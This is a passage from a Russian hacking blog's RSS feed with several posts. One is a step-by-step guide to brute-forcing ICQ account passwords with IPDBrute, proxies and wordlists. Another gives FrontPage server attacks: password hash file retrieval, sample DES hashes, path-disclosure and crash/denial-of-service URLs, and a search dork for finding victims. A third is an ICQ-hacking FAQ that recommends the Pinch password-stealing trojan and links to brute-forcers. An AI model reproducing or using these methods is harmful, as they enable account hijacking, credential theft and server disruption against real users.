Далее открываем склейщик UIN-паролей(в примере я буду показывать как работать все с тем же UINGen&#8217;ом Swift&#8217;a). Выбираем один UIN &#8212; предположим 123456789. Выбираем Словарь: &#8212; пишем путь к словарю. нажимаем кнопку ГЕНЕРИРОВАТЬ, что под графой ОДИН УИН.<br />
Далее &#8212; одинаково-<br />
3) Кликаем по кнопочке ГЕНЕРИРОВАТЬ, что под нашим диапозоном. Во вспывшем окне пишем имя SOURCE.TXT и сохраняем все это в папку с IPDБрутом.<br />
Ищем прокси. можно купить, можно найти бесплатные. бесплатные лучше отчекать каким-нибудь ProxyCheker&#8217;ом. Пример &#8212; http://www.freeproxy.ru/download/P_Checker.exe &#8212; качаем, изменяем только во вкладке main &#8212; Source file &#8212; список проксей(причем можно не просто проксей, но и проксей в таблице с лишними данными &#8212; программа автоматически отсеивает прокси и находит к ним порты!!!), Destination file &#8212; файл, в который сохранять хорошие прокси. МОжно сразу в PROXIES.TXT в IPDBrute.<br />
бесплатные прокси тут :</p>
<p>http://virtyworld.ru/load/6-1-0-34</p>
<p>( google вам в помощ)<br />
Открываем IPDBrute. Жмем Config &#8212; там выставляем полные адресы к файлам.<br />
source &#8212; наш source &#8212; оттуда брутфорсер наш будет читать к какому уину подбирать какой пароль.<br />
damp incorrect &#8212; сюда будут сохраняться неверные пары UIN;password<br />
damp correct &#8212; сюда будут сохраняться ВЕРНЫЕ пары UIN;password<br />
proxies list &#8212; тут будут читаться прокси.<br />
Threads &#8212; количество потоков. Это определяет кол-во потоков, в которые будет работать программа. Выбирайте сами, я работаю по 500.<br />
Cleanip every &#8212; время в минутах, через которое будут перепроверяться прокси и убираться &#171;дохлые&#187;. Автомат &#8212; 30.<br />
Change user details -менять ли инфо юзера автоматически.<br />
Change passwords &#8212; менять ли пароль юзера автоматически.<br />
Жмем START и ждем&#8230; можно раз в два часа подходить к компьютеру и веселиться, видя сколько уинов уже попалось, или же пускать скупую слезу, видя на строчку bad: МНОГО_ТЫСЯЧ, good: 0.<br />
Откуда брать словари для брута</p>
<p>http://www.passwords.ru/dic.htm</p>
<p>ftp://ftp.openwall.com/pub/wordlists/<br />
ftp://ftp.cerias.purdue.edu/pub/dict/<br />
ftp://ftp.ox.ac.uk/pub/wordlists/<br />
ftp://ftp.funet.fi/pub/unix/security/dictionaries/</p>
<p>http://www.outpost9.com/files/WordLists.html</p>
<p>http://www.phreak.com/html/wordlists.shtml</p>
<p>ftp://coast.cs.purdue.edu/pub/dict/wordlists/</p>
<p>http://www.securitylab.ru/forum/read.php?FID=2</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-128/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Взлом сервера на FrontPage</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-127/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-127/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:04:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Взлом сайтов и программ]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароль]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=427</guid>
		<description><![CDATA[Итак, мои маленькие любители крепких спиртных напитков, сегодня мы поговорим о дырах в очень известном и популярном сервере FrontPage Server. Эти баги известны всем, так что кто их не знает &#8212; пусть первый бросит в меня камень(в &#171;мнениях&#187; не ругаться и по почкам не бить:)). Короче, мегакульхацкеры, эта статья для вас:). Шо це таке? Frontpage [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet127.jpg" alt="интернет" />Итак, мои маленькие любители крепких спиртных напитков, сегодня мы поговорим о дырах в очень известном и популярном сервере FrontPage Server. Эти баги известны всем, так что кто их не знает &#8212; пусть первый бросит в меня камень(в &#171;мнениях&#187; не ругаться и по почкам не бить:)). Короче, мегакульхацкеры, эта статья для вас:).<br />
Шо це таке?<br />
Frontpage все еще остается одним из самых распространненых инструментов не только по созданию сайта, но и размешения его в сети. Но, что свойственно продукции доблестной фирмы МийкроСакс, содержит огромное количество дыр и уязвимостей. Сам понимаешь, что паролей в одной голове на сто приложений не удержишь, исходя из этого можно сделать заключение &#8212; ПАРОЛИ 70%-ОВ ДОCТУПОВ НА КОМПЕ ОДНОГО ЮЗВЕРЯ ОДИНАКОВЫ! Чем и будем злоупотреблять.<span id="more-427"></span> Можно предположить, что половина паролей фронтпага совпадут с логином к шеллу на сам сервер. А дальше стандартная схема: ломись на телнет, логинся , доставай соответствующий системеме эксплойт и копмилируй. Ну а дальше главный бонус &#8212; приятный статус привиллегированного пользователя Root.<br />
Рассмотрим самые распространненые баги/глюки/дырки в безопасности сайтов под управлением Microsoft Frontpage Server:<br />
1) Один из самых старых багов. Сейчас этот баг уже не является актуальным, но все же иногда бывают прецеденты. Любой юзер может просматривать файлы на том же диске что и фронтпаг не прилагая больших усилий. Исключением являются файлы в папках самого Frontpage, например /_vti_pvt/. Пример:</p>
<p>http://www.zlob-porno-portal.com/&#8230;./Windows/Lamo.pwl</p>
<p>Такой урл позволяет слить файл Lamo.pwl. И так далее со всеми &#171;чувствительными&#187; файлами! Данный баг замечен на системах с Frontpage-PWS32/3.0.2.926, а также некоторых других.<br />
2) Довольно часто на Frontpage сервер стаят расширения pwd или grp, позволяющие администратору или вебдизайнеру удаленно закачивать на сервер файлы. Эти дополнения позволяют хакеру получить контроль чуть-ли не над всем сервером. Все файлы, которыми может воспользоваться хакер, лежат в системной директории Frontpage, а именно, в /_vti_pvt. Эта папка находится в корневой директории сервера. Каждая папка, куда есть доступ посредством Microsoft FrontPage, имеет уникальные права на доступ, и пароли, их определяющие находятся в файлах service.pwd и service.grp. Также можно встретить следующие файлы:<br />
administrators.pwd &#8212; для администраторов<br />
authors.pwd &#8212; для авторов закачиваемых страниц<br />
users.pwd &#8212; для обычных пользователей<br />
В них тоже содержаться пароли<br />
Расширения ФронтПаги создают резервную копию каждого редактируемого файла. Если тв найдешь подобный сайт, прото &#8212; поищи в любой директории папку _vti_cnf &#8212; вы получите полный список файлов в ней. Скачав любой *.pwd файл, ты увидишь что-то вроде: User:7JyxuUUYY9sgQ. Это всем нам знакомый DES &#8212; так что переписывай его в формат 7JyxuUUYY9sgQ:10:200:User:/users/User:/bin/bash и кормите этим очередного btuteforce cracker&#8217;a типа Johna the ripper&#8217;a или Shadow Crack`a.<br />
Пример файла users.pwd:<br />
# -FrontPage-<br />
jmitchel:7JyxuUUYY9sgQ<br />
wolfe:70yTVencjVNUs<br />
cwolfe:7hT30qItX/v2s<br />
3) Надеюсь, никто не будет спорить, что Microsoft Frontpage &#8212; это в первую очередь не веб-сервер, а комплект для разработки и создания сайтов. Наверное, многие из вас, кто занимался дизигном, сталкивались с термином map, т.е. разметка какой-то части рисунка на чуствительные области, например, гиперссылки. Разработчики компании Microsoft включили в свой Frontpage две утилиты, облегчающие жизнь дизайнеру, но довольно-таки сильно затрудняющие жизнь админа: htimage.exe и imagemap.exe. Эти файлы обычно можно найти или в директории /scripts или в /cgi-bin.<br />
Примерное таким способом их и используют:</p>
<p>http://target/path/htimage.exe/mapname?x,y</p>
<p>При запросе с сервера части этой карты (map) диной свыше 741 символа http://target/path/htimage.exe/?0,0 &#8212; FrontPage зависает и перестает работать, в отличии от операционной системы. При этом возможно удаленно обратится к регистру EIP на сервере и это делает вполне возможным исполнение удаленно произвольного кода.<br />
Эти поистине многофункциональные утилиты облегчают хакеру еще одну задачу &#8212; выяснение расположения Frontpage на сервере. Это возможно, благодаря тому, что при GET запросе к htimage.exe может вернуться путь, показывающий структуру диска.<br />
Для примера:<br />
http://target/cgi-bin/htimage.exe?2.2 может вернуть скажем такой резульатат:<br />
E:websitecgi.<br />
UKR-XЫР:&#187;&#8230;.Здесь я, пожалуй, сделаю небольшое лирическое отступление и покажу структуру Frontpage сервера на примере установки его на Windows NT:<br />
Полный путь:<br />
Путь в броузере:<br />
C:InetPubwwwroot<br />
C:InetPubscripts<br />
/Scripts<br />
C:InetPubftproot<br />
C:InetPubwwwroot_vti_bin<br />
/_vti_bin<br />
C:InetPubwwwroot_vti_bin_vti_adm<br />
/_vti_bin/_vti_adm<br />
C:InetPubwwwroot_vti_bin_vti_aut<br />
/_vti_bin/_vti_aut<br />
C:InetPubcgi-bin<br />
/cgi-bin<br />
C:InetPubwwwrootsrchadm<br />
/srchadm<br />
C:WINNTSystem32inetserviisadmin<br />
/iisadmin<br />
C:InetPubwwwroot_vti_pvt&#8230;.&#187;<br />
4) Рассмотрим следующие файлы ФП: shtml.exe или shtml.dll (в зависимости от операционной системы, установленной на серваке). При попытке открыть с помощью этих вайлов некие несуществующие файлы (html, htm, asp или shtml) на сервере произойдет ошибка и он выдаст сообщение, в котором укажет полный путь к корневой директории сервера. Для примера, выполним запрос:<br />
http://target/_vti_bin/shtml.dll/non_existant_file.html и в ответ вы увидите примерно следующее:<br />
&#171;Cannot open &#171;C:localpath on_existant_file.html&#187;: no such file or folder&#187; Примеры запросов:</p>
<p>http://target/_vti_bin/shtml.exe/non-existent-file.html</p>
<p>http://target/_vti_bin/shtml.exe/non-existent-file.htm</p>
<p>http://target/_vti_bin/shtml.exe/non-existent-file.shtml</p>
<p>http://target/_vti_bin/shtml.exe/non-existent-file.asp</p>
<p>5) С фронтПагой в стандартном комплекте поставляется каунтер(типа счетчик посещений), находится он здесь :/scripts/fpcount.exe. Хотя бы один такой счетчик может подвесить весь сервер! Использование:<br />
Данный счетчик выполняется с параметрами:<br />
fpcount.exe?Page=default.htm|Image=3|Digits=6.<br />
Т.е. http://www.zlop-porno-portal.com/scripts/fpcount.exe?Page=default.htm|Image=3|Digits=6 Интерес представляет последний параметр &#8212; количество разрядов. Попросив счетчик показать, к примеру, 32767 цифр вы получите переполнение буфера и запуск доктор ватсона (или другого отладчика, запущенного по умолчанию), который отожрет примерто 4 мегабайта памяти на сервере. Заставив сервер выполнить такой вопрос 20-30 раз(зависит от тачки), вы забъете всю память на атакуемом компе и в следующий раз свалится уже не fpcount.exe, а сам Internet Information Server. Итак, &#171;смертельный&#187; URL -<br />
http://www.zlob-porno-portal.com/scripts/fpcount.exe?Page=default.htm|Image=3|Digits=99999, где www.zlob-porno-portal.com &#8212; URK жертвы. 5) Каким макаром?<br />
Найти сервак на ФронтПаге очень просто! Идешь на www.altavista.com и и задаешь для поиска строку /_vti_pvt. Далее перебирай все найденные ссылки и ищи сайты,на которых стоит Front Page со всеобщим обозрением фалов паролей.<br />
З.Ы. Сайт http://www.zlob-porno-portal.com использовался как домен жертвы, а не как мой порно сервер:). Кстати хорошая идея&#8230;<br />
З.Ы.Ы. Благодарности за помощь в создании статьи объявляются следующим перцам: UkR-XblP, cluz, группа GIN.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-127/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Кто и когда придумал ICQ?</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-122/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-122/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:04:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Взлом сайтов и программ]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароль]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=422</guid>
		<description><![CDATA[ICQ &#8212; расшифровывается, как &#171;I Seek You&#187; (Я ищу тебя). Аська была запущена в 1996 году четырьмя молодыми программистами из Тель-Авива (Израиль): Сефи Вигисер, Арик Варди, Яир Гольдфингер и Амнон Амир. Они назвали свою компанию &#8212; Mirabilis (женское имя). В июне 1998 года Mirabilis продала права на ICQ (за 400 миллионов долларов) крупнейшему американскому провайдеру [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet122.jpg" alt="интернет" />ICQ &#8212; расшифровывается, как &#171;I Seek You&#187; (Я ищу тебя). Аська была запущена в 1996 году четырьмя молодыми программистами из Тель-Авива (Израиль): Сефи Вигисер, Арик Варди, Яир Гольдфингер и Амнон Амир. Они назвали свою компанию &#8212; Mirabilis (женское имя). В июне 1998 года Mirabilis продала права на ICQ (за 400 миллионов долларов) крупнейшему американскому провайдеру AOL (America On-Line).<br />
йконецформыначалоформыКакие альтернативные клиенты существуют и какой безопаснее?<br />
Не секрет, что на сегодня только самый ленивый троян не крадет пароли от стандартного клиента ICQ. По этой причине рекомендуется использовать альтернативные клиенты, т.к.<span id="more-422"></span> это безопаснее и главное удобнее (имхо)! На сегодняшний день существует множество альтернативных клиентов (около десятка), но самыми удобными (имхо) и популярными (под Windows) являются: Miranda IM (http://www.miranda-im.org), &#038;RQ (http://www.rejetto.com/&#038;RQ/) и Trillian (http://www.trillian.cc). Что будете использовать вы (и будете ли вообще) решать вам, но лично я рекомендую вам юзать клиент &#8212; Miranda IM. Этот клиент хорошо продуман, удобнен, мал (по весу) и имеет очень большое кол-во плагинов. К сожалению хоть и сидеть в перечисленных альтернативных клиентах безопаснее, но не один из них на сегодняшний день не дает с моей точки зрения очень хороший защиты. Однако если вы решили использовать Миранду, то я советую вам ознакомиться с моей статьей &#171;Безопасность в Miranda IM&#187; (http://www.web-hack.ru/articles/articles.php?go=8).<br />
=====<br />
Other<br />
=====<br />
Какие аси являются элитными?<br />
Несомненно, во все времена самыми элитными номерами являлись 5-ти значки, номера из первой тысячи шестизнаков (100***) и номера типа xy. Первые круты тем, что ниже их ничего нет и их крайне сложно угнать (читайте дальше). Когда то были и 3х и 4х-знаки, которые выдавались бета-тестерам в 1996г., но на данный момент все четверки удалены (лишь изредка, через поиск можно найти пустые четверки и даже однознаки =). Вторые являются номерами из первой тысячи, с которых началась официальная регистрация. Пятерки и номера типа 100*** пользуется элита, ну а обычный смертные сидят в красивых шести (редко семи) значных номерах (хотя и многая элита сидит на номерах типа xyyyyy, xxxxxy, xxxxyx, xxxyxx, xxyxxy и т.п.), где как можно больше последовательность одинаковых цифр (хотя мне больше нравится игра цифр, типа 123456 и т.д.). Например у Турков (еще одна страна, после России, которая плотно занимается ICQ-хакингом) очень ценятся номера с нуликами &#8212; xy0000 и т.п. Так же пользуются популярностью (при кражах под заказ) номера эквивалентные номеру телефона =)<br />
Какие вообще есть тонкости связанные с примари (PM)?<br />
Под примари мылом (Primary E-mail или PM) понимается, мыло которое было прописано при регистрации (точнее говоря после 1 сентября 1999, об этом читайте дальше). На него в любое время можно выслать пароль от номера (https://web.icq.com/secure/password). Примари НЕЛЬЗЯ (официально) отвязать (хотя и были такие случаи, но все они сводились к поиску лазеек (дыр) в технологии ICQ-серверов). Существует такая байка, что если более десяти раз вписать/удалить какое то мыло, то оно становится примари. Все это обман и не верьте этому!<br />
Данное понятие и возможность выслать пароль на примари мыло появилось 1 сентября 1999 года (The password retrieval service is applicable to Email addresses entered as of September 1, 1999, in the Email field under an ICQ number user details). Все мыла которые были вписаны в асях (на то время уже регистрировались восьмизначки) в то ночь с 31 на 1 сентября стали первичными, т.е. как бы указанными при регистрации.<br />
Но и во всем этом есть тонкость, а именно понятие вторичные мыла (их может быть сколько угодно, ну почти =). Это мыла вписанные (заданные) после примари. Система высылки пароля такая: допустим к вашей асе привязано примари мыло (обозначим его за X). После этого вы ввели подряд еще мыло Y и Z. Система заключается в том, что если вы выслали пароль на ранее введенное мыло, то пароль перестает высылаться на все введенные после него (Once an ICQ password is retrieved, any further attempt to retrieve the password to a more recently entered Email address for that ICQ number, will fail). Т.е. если вы выслали пароль на мыло Y, то вы больше не сможете выслать пароль на мыло Z. Или, если вы выслали пароль на самое первое мыло (примари) X, то вы уже не сможете выслать пароль на все другие мыла (вторичные): Y и Z.<br />
Из выше написанного текста ясно, что самым главным спасательным кругом при потере/краже вашего номера является Primary E-mail (или наиболее старое вторичное мыло, при условии что никто (даже хозяин аси) не знает примари) и оно всегда должно быть у Вас!<br />
У 5-ти значек есть примари?<br />
В принципе оно было (как и у всех ась, оно было введено 1 сентября 1999г.), но в 2000 году Мираблы отключили возможность высылать на пятизнаки пароль Таким образом можно считать, что у пятизнаков на данный момент нет примаков. Весной 2004 годы был найден баг в сервере AOL. Он заключался в том, что тестовым клиентом TestBuddy коннектились к login.oscar.aol.com, устанавливали через него мыло (кстати, таким образом можно было привязать второй примак к шестерке) и высылали пароль через сервер AOL`а. О такой возможности быстро узнало руководство компании и они закрыли багу. По причине отсутствия примака, пятизнаки крайне трудно украсть. Все пятизнаки дарились админами ICQ или поднимались из анрега, через баги сервера, а обычная регистрация началась с номер 100000 (примерно в ноябре 1996г.).<br />
Как узнать Primary E-mail?<br />
Примаки лучше узнавать, через уже насканенные ранее базы. Понятно, что чем старее база, тем больше вероятность, что вы в ней найдете настоящее примари. Из общедоступных баз в инете есть только базы всех шестизнаков и семерок за 2002 год (Автор: Ёжик). Скачать полную весеннюю базы 2002 года (100001-999999, 511700 записей) можно по этой ссылке (http://www.web-hack.ru/books/books.php?go=16). Так же с моего сайта (www.web-hack.ru) вы можете скачать не полную базу 1998 года (100000-100999) и 1999 года (100000-199999) &#8212; http://www.web-hack.ru/books/books.php?go=17 .<br />
Еще в интернете есть сервисы, где в On-Line можно узнать примари, например:<br />
http://icq.xss.ru &#8212; сервис моего сайта. На данный момент в нем используется база 2002, но в будущем планируется добавить в поиск часть от базы 1999 года. Обратите внимание на короткий адрес и легкий дизайн.<br />
http://asechka.ru/base/ &#8212; весна 2002 года, 511700 записей.<br />
Конечно, в природе существую (не только у Мираблов;-) более старые базы (например, полная 1999 или 2000 годов), но эти базы есть у ограниченного кол-ва людей (которых по пальцам пересчитать можно) и не за какие деньги не продаются.<br />
А как посмотреть через поиск примари?<br />
Где-то в конце весны 2003 в поиске и личной информации профилей, перестало показываться мыло. Введение наверно было сделано для отпора спамеров, которые довольно легко собирали спам-листы и против ICQ-хакеров (понятно по каким причинам). 11 февраля 2004 года я нашел способ (http://www.web-hack.ru/archive/news.php?go=180), как узнавать через поиск мыло прописанное в поле &#8212; Primary E-mail. Следующий алгоритм тестировался на Миранде (http://www.miranda-im.org), как такое дело обстоит на других клиентах я не знаю (если я не ошибаюсь, то в &#038;RQ мыло сразу выводит при поиске):<br />
1) Задаем в поиске нужный uin<br />
2) Записываем Nick (для надежности дальнейшего поиска запишите еще имя и фамилию).<br />
3) Вбиваем найденный Nick в поля ввода и нажимаем опять поиск<br />
Теперь в результате поиска будет показано мыло прописанное в асе (если оно действительно прописано и не скрыто), как в старые добрые времена.</p>
<p>Какие интересные ссылки подкинешь?<br />
К наиболее интересным и информативным сайтам я могу отнести:</p>
<p>http://www.asechka.ru</p>
<p>http://www.iseekyou.ru</p>
<p>http://www.icqinfo.ru</p>
<p>Наиболее большими форумы по ICQ-хакингу являются:</p>
<p>http://forum.web-hack.ru</p>
<p>http://forum.asechka.ru</p>
<p>Сайты с интересным софтом:</p>
<p>http://www.cobans.net</p>
<p>http://www.ifud.ru</p>
<p>http://www.mirabiliz.com</p>
<p>http://www.icqz.net</p>
<p>Сервисы от ICQ:<br />
http://www.icqmail.com &#8212; почтовый ящик вида @icqmail.com<br />
http://home.icq.com &#8212; хостинг на 20Mb с доменам вида name.home.icq.com<br />
Также через любой поисковик можно найти много других более мелких сайтов по ICQ и шопов.</p>
<p>Какой пароль посоветуешь использовать?<br />
Пароль необходимо задавать такого типа &#8212; zWqT_oG2 (чувствительный к регистру, с цифрами и желательно со спецсимволами). Так же я рекомендую менять пароль раз в месяц. Большинство людей занимающихся кражей пароля по методу его подбора (брутфорс) обычно используют для подбора словарные слова (типа: admin, password, god, sex и т.д.). Например, админский номер мираблов 88888, был украден методом подбора пароля (паролем оказалось еврейское имя), к сожалению через несколько дней аська была возвращена владельцу. Очень важно как можно чаще менять пароль т.к. хоть и на подбор пароля типа U#S$r.^H могут уйти месяцы, но мне известны случаи, когда создавался словарь восьмизначных паролей типа >AB>F%uq и примерно за месяц брута (на выделенке) номер угонялся.<br />
Я бы посоветовал генерировать пароли утилитой Password Generator (http://www.web-hack.ru/download/info.php?go=26), если у вас нет возможности ею воспользоваться, то вы можете зайти на страницу генерации пароля в On-Line (написанную мною) &#8212; http://www.web-hack.ru/tools/pasgen.php .<br />
Я слышал о многострочных паролях, что это такое?<br />
Несколько лет назад эта тема была очень актуальна, но в 2003 году эту лазейку закрыли. Фишка заключалась в том, что в пароле указывался символ переноса каретки на одну (и более) строк вниз и пароль на мыло приходил в совершенно непонятно видел для незнающего человека (первое время многострочные пароли вообще не приходили). Получалось так: что как бы и примари у хозяина, и он может выслать на него пароль но не может, почему пароль не принимает сервер. Видимо в 2003 суппортам icq.com надоело принимать письма с просьбой помочь со сменой многострочного пароля и администрация сделала финт ушами: теперь если в пароле используются спецсимволы, то в письме высылаемом при восстановлении пароля вкладывается специальная сгенерированная ссылка (резет-линк), при заходе на которую, на номере автоматически меняется пароль который генерируется сервером. Резет-линк остается действительным в течение одного дня, после высылки пароля. Таким образом, можно защищаться от кидал, делая резет-линк и отдавая пароль от ICQ (если ася без примака). И если вас решат кинуть, то просто зайдите по ссылки и смените пароль</p>
<p>Как скрыть IP-адрес?<br />
Одним из важных моментов защиты вашего компьютера и уина (uin) от взлома является &#8212; скрытие вашего IP. Стандартный клиент ICQ уже давно по умолчанию скрывает ваш IP (проверьте на всякий случай: заходим в Security &#038; Privacy Permissions, потом в Peer To Peer Connection ставим Allow Peer To Peer Connection with any user upon your authorization). Однако во многих альтернативных клиентах по умолчанию отключена возможность скрывать IP. В Миранде установить скрытие IP можно так: Настройки\Сеть\ICQ Privacy\Прямые соединения только с авторизированными пользователями.</p>
<p>Можно ли через веб сменить пароль и изменить инфу в асе?<br />
Когда то давно пароль можно было сменить через сайт www.icq.com , но в связи с дырой найденными в этой системе (это было очень давно) администрация решила убрать возможность смены пароля. И теперь вы можете сменить лишь личную информацию по ссылке &#8212; http://web.icq.com/whitepages/login/ .</p>
<p>Как можно оживить асю из анрега, а то я слышал о какой то проге?<br />
Анрег &#8212; это когда по причине, каких то нарушений пользования сервисом ICQ, его администрация удаляет (блокирует) ваш номер ICQ. Анрегнутые номера это такие, которые в поиске не ищутся (хотя бывает, когда и не анрегнутые аси не ищутся через поиск). Оживить эти номера могут ТОЛЬКО админы ICQ (ну или хакеры, знающие какие ни будь дыры в сервисе ICQ). Если вы увидите в инете программу, которая якобы оживляет анрегнутые (удаленные) номера, то не поддавайтесь на развод, в 99,99% случаем это троян!</p>
<p>Как защитить асю от кражи?<br />
В выше написанном тексте были описаны все способы защититься от крыжи uin`а. Однако я подведу кратко общий итог:<br />
1) Необходимо владеть Primary E-mail`ом<br />
2) Ставьте сложные пароли и как можно чаще меняйте их<br />
3) Скрывайте свой IP<br />
4) Из общих советов безопасности могу посоветовать: чаще обновлять базу антивируса и проверять им все программы скаченные из инета, установите FireWall, не скачивайте программы с сомнительных сайтов, не пускайте никого за свой комп и не поддавайтесь на социальную инженерию.</p>
<p>Я слышал, что у кого-то есть десятизначка, такое может быть?<br />
Да, но десятизначные номера являются лишь зеркалом уже существующих номеров. Этот секрет довольно старый и заключается в том, что надо прибавлять к любому номеру &#8212; число 4294967296. Например, если у вас номер 123456, то прибавив к нему 4294967296 мы получаем номер 4295090752. Это число можно прибавлять, прибавлять и еще раз прибавлять (хоть до 15-и знака &#8212; 495948463727168) и всегда попадать через поиск на номер 123456. Для генерации зеркал вашей аси существует программа &#8212; FakeUIN.</p>
<p>Что такое ася-неведимка?<br />
Данное понятие появилось в середине 2004 года, когда мираблы сделали нововведение, которое заключается в том, что номера которые имеют пустую инфу и/или долго не использовались, не ищутся в поиске. Создается иллюзия, что номера находятся в анреге. Стандартными клиентами эти номера нельзя добавить в контакт. Но эти номера являются полностью работоспособными: в них можно логиниться (только с ICQ Lite и ICQ 2003 Pro Build 3916, иначе номер сразу же появятся в поиске), принимать/отправлять сообщения, но ни в коем случае нельзя менять инфу, иначе они так же станут видимыми.</p>
<p>========<br />
HackSoft<br />
========<br />
Я скачал программу а она не заработала, а еще вскоре мою асю угнали. В чем дело?<br />
В последнее время развелось очень много троянов ворующих ваши пароли В большинстве случаев это софт связанный со сменой пароля или определения IP-адреса, кстати, в большинстве случаем попадаются и работоспособные варианты программ крадущие ваш пароль Совет: скачивайте программы с проверенных сайтов (а не с сомнительных) или проверяйте трафик от работы программы сниффером.</p>
<p>Как определить IP-адрес человека в аське?<br />
Наиболее популярной программой для определения IP-адреса является uin2ip, но в инете развелось на столько много троянов, которые представляются или зашиваются в эту прогу, что я посоветовал бы программу Show ICQ IP (http://www.web-hack.ru/download/info.php?go=105), которую написал inf специально для нашего сайта. Кстати, такой клиент, как Miranda тоже умеет определять IP (для определения откройте в профиле нужного номер вкладку &#171;ICQ&#187;). IP определяется лишь у старых версий ась, таких как icq2000a/b,2001a. Сейчас IP может быть показан только в том случае если юзер забыл, поставить запрет на показ IP всем в настройках аси или любого другого клона. В некоторых случаях можно узнать IP также если вы находитесь в контакт листе пользователя которого вы проверяете на открытый IP, что конечно же маловероятно.<br />
C выходом новой ветки (возможно на момент чтения вами этой статьи, этот тип клиентов будет уже и очень даже старым =) ICQ-клиентов &#8212; ICQLite и Xtraz, стало возможным определять IP (а иногда и порт) безо всякого труда. Для этой цели можно использовать утилиту &#8212; ICQLite IP-Xtraz (by inf) &#8212; http://inf.icqz.net/progs/ipxtraz.zip</p>
<p>Какой брутфорс лучший?<br />
За все время существования сети ICQ было написано много брутфорсов, но некоторые уже не работают, а некоторые слишком медленные. Наиболее удобным и быстрым на сегодняшний день является IPDbrute (http://www.web-hack.ru/download/info.php?go=46).</p>
<p>А какие брутфорсы есть под *nix?<br />
К сожалению, под *nix`ы существует не так много хороших брутфорсов. Мне известен лишь два:<br />
1) Скрипт на Perl который можно запустить на шелле. Его написал Forb &#8212; http://kamensk.lael.ru/forb/soft/icq.zip .<br />
2) THC-Hydra (http://www.thc.org), который кроме ICQ-протокола умеет брутить и: FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL VNC, ICQ, Socks5, PCNFS, Cisco and more.<br />
Если у вас имеется работающий брутфорс, то прошу поделиться.</p>
<p>Как наиболее легче менять пароль и изменять инфу?<br />
Для этого есть очень популярная программа C4PassChanger (http://www.web-hack.ru/download/info.php?go=34). Кроме нее есть еще и много других, но не советую их качать с сомнительных сайтов, может так получиться, что в них трой и новый пароль улетает их автору.</p>
<p>Какие сканеры существуют?<br />
Под сканерами в мире ICQ-хакинга понимаются программы для сбора личных сведений и примари мыл у пользователей ICQ. Очень популярной в свой время была программа Assault, но в 2003 году ее использование стало неэффектным, т.к. стало возможным делать запрос на поиск с одного номера всего 200 ась. Проблема решается юзанием большого списка ась, через которых будет проходить сканирование. Наиболее хорошей программой в настоящее время является Ba!amut ICQ Spider (http://spszone.com), но к сожалению она не умеет сканить по диапазону ась.</p>
<p>Какой троян посоветуешь для кражи паролей от аси?<br />
Очень хорошим трояном, которые крадет пароли от основных мессенджеров ICQ (ICQ99b-2003a/2003b/Lite, Miranda-icq, Trillian ICQ&#038;AIM, &#038;RQ и многих других программ) является Pinch (http://www.web-hack.ru/download/info.php?go=49). Есть еще один интересный (платный) троян A-311 Death (http://www.prodexteam.net/a311.htm). Конечно, существует много и других трое крадущих пароли от ICQ.<br />
Почему у меня не работает программа автоматической высылки пароля на мыло?<br />
В конце 2003 года из-за эксплоита написанного человеком с ником coban2k, который позволял на ЛЮБОЕ мыло высылать, через сервис восстановления пароля, сколько угодно флуда. Вскоре администрация icq.com прикрыла эту дыру + теперь при восстановлении пароля (https://web.icq.com/secure/password) требуется ввести слово с картинки (метод &#171;кэпч&#187;). Следовательно, все программы связанные с высылкой пароля через этот сервис ушли в небытие.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-122/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Присвоение чужого ICQ и его клиентов, 14 способов!</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-119/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-119/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:04:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Взлом сайтов и программ]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
